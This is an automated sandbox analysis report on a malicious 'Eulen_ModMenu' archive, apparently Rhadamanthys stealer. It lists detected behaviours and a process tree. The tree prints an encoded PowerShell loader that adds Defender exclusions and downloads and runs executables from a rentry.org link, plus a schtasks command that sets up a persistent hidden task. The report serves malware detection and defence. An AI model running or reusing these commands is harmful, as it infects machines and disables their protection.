Analysis Overview
Threat Level: Known bad
The file https://cdn.discordapp.com/attachments/1138363786823217202/1242262922730672198/Eulen_ModMenu.7z?ex=66547340&is=665321c0&hm=68de9a30b8aaa300125ba9c0a54306d06fb87f876346ed3b33a2a39d833fd477& was found to be: Known bad.
Malicious Activity Summary
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
Downloads MZ/PE file
Blocklisted process makes network request
Executes dropped EXE
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Command and Scripting Interpreter: PowerShell
Suspicious behavior: EnumeratesProcesses
Enumerates processes with tasklist
Checks SCSI registry key(s)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Creates scheduled task(s)
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Delays execution with timeout.exe
Modifies registry class
Enumerates system info in registry
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-26 19:40
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-26 19:40
Reported
2024-05-26 19:43
Platform
win10v2004-20240226-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4920 created 2340 | N/A | C:\Users\Admin\AppData\Roaming\q5ydrqg4.edc1.exe | C:\Windows\system32\sihost.exe |
| PID 5072 created 2340 | N/A | C:\Users\Admin\AppData\Roaming\41yjujbz.1rp1.exe | C:\Windows\system32\sihost.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Eulen_ModMenu\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\q5ydrqg4.edc0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Eulen_ModMenu\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\41yjujbz.1rp0.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\Eulen_ModMenu\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\q5ydrqg4.edc0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\q5ydrqg4.edc1.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Eulen_ModMenu\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\41yjujbz.1rp0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\41yjujbz.1rp1.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{ED1076E9-58D1-491C-A1C7-C9990BD1E84D} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1138363786823217202/1242262922730672198/Eulen_ModMenu.7z?ex=66547340&is=665321c0&hm=68de9a30b8aaa300125ba9c0a54306d06fb87f876346ed3b33a2a39d833fd477&
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=3724 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=3744 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4244 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=5572 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=5908 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6188 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\26eb46dee30342678ac1fc23a0581bec /t 5072 /p 3576
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x2bc,0x7ff989062e98,0x7ff989062ea4,0x7ff989062eb0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2264 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2432 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2556 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3552 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3684 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4948 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4672 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=4976 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4020 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5476 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=3772 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6092 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6092 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6080 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6492 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Eulen_ModMenu.7z"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\Eulen_ModMenu\Launcher.exe
"C:\Users\Admin\Desktop\Eulen_ModMenu\Launcher.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdAB6AHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbABiAHcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaAByAGQAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHAAYQBuAGMAZQBrADYAMQAxADEAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbAB0AHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAGgAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAHkAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAcQBuAHUAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABpAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG4AZwB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB4AG4AbAAjAD4A"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=152 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6612 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6616 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Users\Admin\AppData\Roaming\q5ydrqg4.edc0.exe
"C:\Users\Admin\AppData\Roaming\q5ydrqg4.edc0.exe"
C:\Users\Admin\AppData\Roaming\q5ydrqg4.edc1.exe
"C:\Users\Admin\AppData\Roaming\q5ydrqg4.edc1.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FA78.tmp\FA79.tmp\FA7A.bat C:\Users\Admin\AppData\Roaming\q5ydrqg4.edc0.exe"
C:\Windows\system32\chcp.com
chcp 1251
C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\schtasks.exe
schtasks /query /tn "MyBatchScript"
C:\Windows\system32\schtasks.exe
schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
